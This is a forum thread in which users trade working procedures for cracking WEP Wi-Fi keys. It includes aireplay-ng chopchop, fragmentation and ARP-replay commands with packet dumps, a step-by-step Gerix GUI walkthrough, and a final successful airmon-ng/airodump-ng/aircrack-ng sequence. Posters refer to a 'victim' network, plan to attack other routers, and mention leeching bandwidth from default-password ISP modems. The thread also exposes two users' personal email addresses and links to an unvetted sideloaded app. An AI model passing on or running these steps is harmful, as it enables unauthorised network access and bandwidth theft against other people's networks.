• Networking
  • WEP and WPA pass cracking! Full Tutorial.

you need to wait till you get more IVs.
Wait till it gets to 30-40k IVs and then try the last step.
2 years later
Hello,

It's actually a nice tutorial, i been working on getting it work since a month with no luck!
I have a question, sometimes when doing "aireplay-ng -4 -b 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1" or "aireplay-ng -1 0 -a 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1
" it says wrong channel so i keep doing it till it goes in the right channel is this normal? or does it affect the process in any way?

And i have a problem on step 8 i'm getting

root@bt:~# aireplay-ng -4 -b 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1
20:35:27 Waiting for beacon frame (BSSID: 00:26:44:26:D7:DF) on channel 6
Read 1598 packets...

Size: 68, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:26:44:26:D7:DF
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:26:44:26:D7:DE

0x0000: 0862 0000 ffff ffff ffff 0026 4426 d7df .b.........&D&..
0x0010: 0026 4426 d7de 2053 1f4f 8d00 a3e4 278f .&D&.. S.O....'.
0x0020: f4b2 cbc5 54f8 66f1 5f35 e5db c0f7 4c86 ....T.f._5....L.
0x0030: 1b3d 3c91 a20c d405 c0ba 8131 30f3 4201 .=<........10.B.
0x0040: 7810 7e8c x.~.

Use this packet ? y

Read 1608 packets...

Size: 68, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:26:44:26:D7:DF
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:26:44:26:D7:DE

0x0000: 0842 0000 ffff ffff ffff 0026 4426 d7df .B.........&D&..
0x0010: 0026 4426 d7de 5053 224f 8d00 3b8b bec5 .&D&..PS"O..;...
0x0020: cc1d b5b5 e914 c6b1 8524 c31f 1437 1543 .........$...7.C
0x0030: ee56 00e8 3582 c217 9884 ddab 81f0 5c33 .V..5.........\3
0x0040: 63ad 215a c.!Z

Use this packet ? y

Saving chosen packet in replay_src-0809-203819.cap

got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
Sent 7379 packets, current guess: B6...

The chopchop attack appears to have failed. Possible reasons:



Why is it failing after 2 success?(happened twice before after 1 success packet) can it be coz low signal or something ? its a WEP wifi network
and where i can find this "(.xor you received in the last step)" Do i have to write Y many times till i get this?

Sorry if i'm annoying, thought it would be the best place to get help from, my country's peeps :D

Thanks in advance
@FOu4d try fragmentation attack, it could be a low signal.
do you have BT5?
there is an easier method without no single code, begin with this, then try moei method.

1- run gerix-wifi-cracker-ng (it's pre-installed on BT5) it's under exploitation tool> wireless exploitation> wlan exploitation.
2- go to configuration tab. click on your interface then on enable/disable monitor mode. a new inteface will open.
3- click on the new interface and set random mac address.
4- select all channel and click rescan.
5- highlight the network you want to crack its password.
6- go to wep tab and click start sniffing and logging.
7- since cc didn't work with you i'll use fragmentation attack. click on associate with fake ap using fake auth. after you click it, OPN will appear in the terminal opened before.
8- click on fragmentation attack, then type y in the terminal.
9- click create the arp packet to be injected on the victim access oint.
10- now inject it by clicking on inject the created packet. wait until it reach abt 15000 and stop it.
12- go to cracking tab and click on aircrack-ng decrypt wep password.
a new terminal will open.
Key Found!

if you have further questions install my android app, download it from this link (it's not published on the play store):
http://sdrv.ms/LHSOkc
I have a question, sometimes when doing "aireplay-ng -4 -b 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1" or "aireplay-ng -1 0 -a 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1
" it says wrong channel so i keep doing it till it goes in the right channel is this normal? or does it affect the process in any way?
I think that your problem is that you are not using aireplay-ng on the right channel , because the channel changes sometimes so one way to know is to open a new terminal window and use airodump-ng to see all the networks so you can find your victim's new channel , and then retry the aireplay-ng with the channel you found.
Hello Roudy,

Thanks for this awesome method with a great tutorial! much appreciated!

Eventhough i had some problem with deauthentication after clicking Y on 1 packet to use but i managed to make it work and get "saving keystream in .... .xor" with different wifi networks

After that i did the next step and got

"Saving choosen packet to in replay.... .cap"
"You should also start airpdump to capture replies."

"End of file."

So after that i went to the last step in the cracking tab and clicked on "aircrack-ng - Decrypt WEP Password"
it opens a terminal and it start testing keys then it stop and nothing happen and i dont get "Key Found!" (I closed the terminal and clicked it again and same thing happened but with different number of tested keys and IVS)

Please take a look on my screenshots!

Screen 1:


Screen 2:


So i guess i'm stuck at the last step any idea why this happening ?

Thanks..
ok, so your problem is with injecting the created packet.
in the first screenshot, does OPN appear in the top left terminal? (it's next to CIPHER) make sure it appears before you continue.
retry the tutorial and tell me what you get.
note that if one step is skipped or didn't work, all the cracking will fail.
also make sure you clean old files before you start any task, this can be done by clicking clean old files in the configuration tab.
hope it helps!
question. how i can i identify my wireless card and how i know if it supports injection.
Rodster wrotequestion. how i can i identify my wireless card and how i know if it supports injection.
open gerix wifi cracker as i said before. go to configuration tab, if anything appear under interfaces then your card is supported. if nothing appears then it's not supported.
Roudykh wrote
Rodster wrotequestion. how i can i identify my wireless card and how i know if it supports injection.
open gerix wifi cracker as i said before. go to configuration tab, if anything appear under interfaces then your card is supported. if nothing appears then it's not supported.
but that application exist in backtrack iam runing windows. i want to check before i downlad it.
well i'm stupid :P kept refreshing the page waiting ur reply and i didn't notice it went to page 2 :P

Anyway i tested again, tested both method CC and Fragmentation and it seems that the problem is after clicking either "Start the CC attack" or "Fragmentation attack" it first read the packet and i type y after that it fails to send the packet and keep getting a deauthentication packet.

btw the Injection test works great and it says "Injection is Working!" (using my USB adapter)

Check this screenshot for the Fragmentation Method:



and this screenshot is for the CC method:



And i have some question if you don't mind:

1)Sometimes when i enable wlan0 which is my USB Wifi adapter TP-LINK WN321G (Ralink 2573 with Driver rt73usb) and i press on rescan networks i get no networks so i keep enabling and disabling it to get network but when i do enable my network card (Atheros AR2425 with driver ath5k) and scan networks on it i get all wifi networks directly, can the problem be caused from my USB adapter? (Injection works on my USB and not sure if does on my network card :/ )

2)I have a TP-Link router without any connection on, if i set it on a WEP WiFi will i be able to crack it? or has to be connected to the internet? it might be better testing the process on a closer WiFi network.

3) I'm doing the attack on my laptop, but i have a PC would u suggest trying the attack from PC ? or it doesn't matter?

I'm so frustrated and want to be able to get it work and see this sentence "Key Found!" :P
i really appreciate your help, Thanks!
Rodster wrote
Roudykh wrote
Rodster wrotequestion. how i can i identify my wireless card and how i know if it supports injection.
open gerix wifi cracker as i said before. go to configuration tab, if anything appear under interfaces then your card is supported. if nothing appears then it's not supported.
but that application exist in backtrack iam runing windows. i want to check before i downlad it.
check if your adapter figure http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=5205d8e2201d6f3161d5e4d4060c1fe5#compatibility
@ F0u4d 1) it doesn't matter if you do injection with your internal card or external adapter cz from your screenshots it appears that your usb adapter support injection.
2)yes, try to do the process on your router, it's better to get good signal. it doesn't matter if there's internet or not.
3) it doesn't matter unless you're cracking wpa (it needs good ram and cpu speed to do the process quickly)

Ok then, retry the process but substitute step 7 from my tutorial with step 6 from m0ei.(it appears the mac address isn't associated with fake AP)

note that sometimes it doesn't work from the first time, so be patient.

hope it helps!
ok so i used the step 6 instead of your step 7 which is before the fragmentation attack or cc
when i first wrote the code as m0ei wrote it i got an error then they mentioned to add --ignore-negative-one and it worked...
but the problem still the same on the next step



so that's really weird :/
i added you on the email you provided at the forums here @outlook.com.. if u don't mind adding
you shouldn't ignore the negative one, negatives mean fake.
try to add the ESSID in the command (name of the network as it appears)
it's weird indeed! sometimes i get this problem but i retry it and everything goes good.
Yeah i renamed my hotmail to the new outlook, you should give it a try, metro UI (or should i say win8 UI)
nah i don't mind, feel free to ask any question.
reply.
i added you on your e-mail Roudy_Kh@outlook.com from my e-mail Fouad.Raheb@hotmail.com
ill be online if you have time later to accept me so i can stop annoying people here and annoy you in private lol

btw i first tried adding ESSID and it was same so in the next try i removed it

Thanks!
i'll add you.
but we need some help here guys!
it just works for me, i don't know why it didn't work with you.
some help please...
case cancelled
Hey roudy!

I finally succeeded cracking my own TP-Link router on a WEP encrypted key "hello" using the following process:

1)Airmon-ng [Check available wireless cards]
2)Airmon-ng start wlan0 [Enable the card on monitor mode]
3)Airodump-ng mon0 [check the available wifi networks]
4)Airodump-ng -c (channel) -w (saving file name example "wep") --bssid (bssid of the target) mon0
5)New Terminal Airplay-ng -1 0 -a (bssid) mon0 [Association successfull]
6)Aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff: -b (bssid) mon0 [Reading packets... use this packet? write "y" and hit enter... sent packet] [capturing data should speed up]
7)New Terminal Aircrack-ng -n (key lenght 64/128/256.. can be skiped) -b (bssid) (saved file Ex: wep-01.cap)
Key Found!

i found some steps on a youtube video which i merged them with some commands i had and it worked :D

now i will be trying it on some other routers I hope it will works :)
i can crack a wap and wep in 3min but for real world example you need to crack wpa2, who's stupid enough these days to use wap or wep?
someone wrotewho's stupid enough these days to use wap or wep?
well there are plenty of Ogero modems with default WEP passwords that can be cracked instantly(with programs/manually) but I don't blame the public since not everyone knows about the technicals of wireless encryption, now Ogero did set up a small tutorial on how to change the passkey of the modem but i wonder if they are still giving new customers default passworded WEP modems, because as we all know bandwidth is a sacred thing here and if someone feels like playing the leeching game someone else is gonna pay a hefty price